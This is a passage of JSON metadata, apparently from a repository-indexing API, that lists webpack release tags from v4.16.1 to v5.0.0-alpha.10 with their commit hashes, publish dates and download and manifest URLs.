c02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.